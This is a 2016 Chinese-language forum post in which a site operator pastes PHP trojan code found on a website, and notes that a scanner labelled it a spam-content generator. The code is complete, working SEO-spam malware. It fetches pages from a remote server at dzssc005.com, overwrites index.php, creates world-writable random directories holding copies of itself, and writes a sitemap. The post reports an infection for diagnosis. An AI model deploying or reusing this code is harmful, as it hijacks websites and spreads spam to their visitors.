热搜词
发表于 2016-10-2 21:52:48 | 显示全部楼层 |阅读模式
在检测网站时,发现里面有很多木马网页,代码如下:

<?php
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://www.dzssc005.com";
$directory_Number=5;
$Branch_directory_1=getCode(mt_rand(3,5));
$Branch_directory_2=getCode(mt_rand(3,5));
$Branch_directory_3=getCode(mt_rand(3,5));
$Branch_directory_4=getCode(mt_rand(3,5));
$Branch_directory_5=getCode(mt_rand(3,5));
$Branch_directory_6=getCode(mt_rand(3,5));
$Branch_directory_7=getCode(mt_rand(3,5));
$Branch_directory_8=getCode(mt_rand(3,5));
$Branch_directory_9=getCode(mt_rand(3,5));
$Branch_directory_10=getCode(mt_rand(3,5));

$Branch_directory = $Branch_directory_1.".".$Branch_directory_2.".".$Branch_directory_3.".".$Branch_directory_4.".".$Branch_directory_5.".".$Branch_directory_6.".".$Branch_directory_7.".".$Branch_directory_8.".".$Branch_directory_9.".".$Branch_directory_10;

$NewFile_content = getFileCont("index.php");

if (empty($NewFile_content)) {
        exit("<p align='center'><font color='red'><b>Load......</b></font></p>");
}

$ml = $_SERVER['REQUEST_URI'];
$str= explode("/", $ml);
$Quantity = count($str)-1;

$host_name = str_replace("index.php", "", "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);

if ($Quantity<6 && $Quantity>0) {
        $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
        if ($Content_mb=="") $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
        if (strpos($Content_mb,"tj.js")) {
            echo $Content_mb;       
                $Remote_directory = $Remote_server."/directory.php?type=index.php&host=".$host_name."&directory=".$Branch_directory;
            $Content_directory = GetHtml($Remote_directory);
                  $Branch_directory= explode(".",$Branch_directory);
                $sitelinks="<li><a href='".$host_name."index.php'>".$host_name."index.php</a></li>";               
            for ($i=0;$i < count($Branch_directory); $i++) {
                  $dirname=$Branch_directory[$i];
                  $check = CFolder("./".$dirname."/");
                  if ($check == 1) {
                        WriteIn("./".$dirname."/index.php",base64_encode($NewFile_content));
                        $alink="<li><a href='".$host_name.$dirname."/index.php'>".$host_name.$dirname."/index.php</a></li>";
            $sitelinks.=$alink;                       
                       
                }
        }

         $site_mb=GetHtml($Remote_server."/mb/sitemap.html");
         $site_mb=str_replace("{links}",$sitelinks,$site_mb);
         WriteIn("./sitemap.html",base64_encode($site_mb));
         
         WriteIn("./index.php",base64_encode($Content_mb));
         chmod("index.php",0644);
       
        }

        //echo "<meta http-equiv='refresh' content='0; url=index.php'>";
        exit();

} else {
        $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
        if ($Content_mb=="") $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
        if (strpos($Content_mb,"tj.js")) {
          WriteIn("./index.php",base64_encode($Content_mb));
          chmod("index.php",0644);
      echo $Content_mb;
        }
       
        exit();
}  

function getCode($iCount) {
        $arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789";
        $code="";
    for ( $i = 0; $i < $iCount; $i++ )  
        {
                $code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];  
        }  
        return $code;
}

function Digital($iCount) {
    $arrChar = "0123456789";
        $code="";
    for ( $i = 0; $i < $iCount; $i++ )  
        {
                $code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];  
        }  
        return $code;
}

function sj_int($min, $max) {
        return mt_rand($min, $max);
}

function WriteIn($testfile, $msg) {
        if (empty($msg)) {
                echo "Content null";
                return;
        }
        $msg=base64_decode($msg);
        $fp = @fopen($testfile,"w");
        fwrite($fp,$msg);
        fclose($fp);
}

function getFileCont($testfile) {
        $restr = '';
        $fp = @fopen($testfile,"r");
        if ($fp) {
                while($line=fgets($fp,1024)) $restr.=$line;
                fclose($fp);
        }
        return $restr;
}

function CFolder($Filepath) {
  if (!file_exists($Filepath)) {
        mkdir($Filepath, 0777);
        return 1;
  }
  return 0;
}

function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );

        $context = stream_context_create($opts);

        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Server Error...</b></font></p>");
        }
       
        return $html;
}

function GetHtml($url) {
        return getHTTPPage($url);
}


用护卫神云查杀工具扫描后,提示为“垃圾内容生成器-1748”

全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2025-1-9 22:06 , Processed in 0.201338 second(s), 23 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2025 Discuz! Team